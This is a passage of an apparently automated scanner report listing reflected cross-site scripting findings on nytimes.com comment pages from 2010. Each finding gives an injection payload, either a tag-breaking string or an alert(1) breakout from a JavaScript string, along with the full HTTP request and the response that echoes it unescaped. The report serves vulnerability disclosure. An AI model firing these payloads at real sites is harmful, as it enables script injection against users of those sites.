The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78489"><a>817c3be883f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments78489"><a>817c3be883f/artsbeat.blogs.nytimes.com/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponL
...[SNIP]...

3.95. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8d7d"><a>64403273679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33735

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb8d7d"><a>64403273679/yr/mo/day/tangled-web-of-rubicon-unravels-at-amc/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom8,Bo
...[SNIP]...

3.96. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adb13"-alert(1)-"3ff71f84a46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 111743

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
nytimesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142657";
var s_pagename = "2010/11/11/tangled-web-of-rubicon-unravels-at-amc/?adb13"-alert(1)-"3ff71f84a46=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.97. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 683a8"><a>11401750f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71155

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments683a8"><a>11401750f9d/artsbeat.blogs.nytimes.com/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpro
...[SNIP]...

3.98. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d604c'-alert(1)-'959e8c51a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /commentsd604c'-alert(1)-'959e8c51a4/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsd604c'-alert(1)-'959e8c51a4';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.99. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0ae8"><a>8de1386f669 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34121

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comd0ae8"><a>8de1386f669/yr/mo/day/book-review-podcast-the-emperor-of-all-maladies/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,B
...[SNIP]...

3.100. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39b70"-alert(1)-"15696141ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70687

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Book Re
...[SNIP]...
obal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142919";
var s_pagename = "2010/11/12/book-review-podcast-the-emperor-of-all-maladies/?39b70"-alert(1)-"15696141ef9=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.101. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6f44b'-alert(1)-'ffb7079026e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments6f44b'-alert(1)-'ffb7079026e/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71428

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments6f44b'-alert(1)-'ffb7079026e';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.102. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a761b"><a>0b788a6f155 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71340

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentsa761b"><a>0b788a6f155/artsbeat.blogs.nytimes.com/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2
...[SNIP]...

3.103. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e568"><a>5f636f3fe12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34004

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com8e568"><a>5f636f3fe12/yr/mo/day/here-comes-rhymin-simon-on-a-different-label/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bott
...[SNIP]...

3.104. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28ef0"-alert(1)-"0efdcf8adda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70837

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Here Co
...[SNIP]...
sglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143041";
var s_pagename = "2010/11/12/here-comes-rhymin-simon-on-a-different-label/?28ef0"-alert(1)-"0efdcf8adda=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.105. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e835'-alert(1)-'6462f262221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments8e835'-alert(1)-'6462f262221/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83378

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments8e835'-alert(1)-'6462f262221';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.106. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf869"><a>05cee7fdfb2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 83360

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentscf869"><a>05cee7fdfb2/artsbeat.blogs.nytimes.com/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_ass
...[SNIP]...

3.107. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3ba3"><a>7ad4e47b7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34445

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comf3ba3"><a>7ad4e47b7bb/yr/mo/day/kanye-west-was-coached-for-today-interview-gone-awry/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bott
...[SNIP]...

3.108. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8483d"-alert(1)-"5bab4140001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81137

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Kanye W
...[SNIP]...
nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_143059";
var s_pagename = "2010/11/12/kanye-west-was-coached-for-today-interview-gone-awry/?8483d"-alert(1)-"5bab4140001=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.109. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52017'-alert(1)-'7d721cbfae3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments52017'-alert(1)-'7d721cbfae3/artsbeat.blogs.nytimes.com/2010/11/12/proposal-recommends-charging-admission-at-the-smithsonian/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
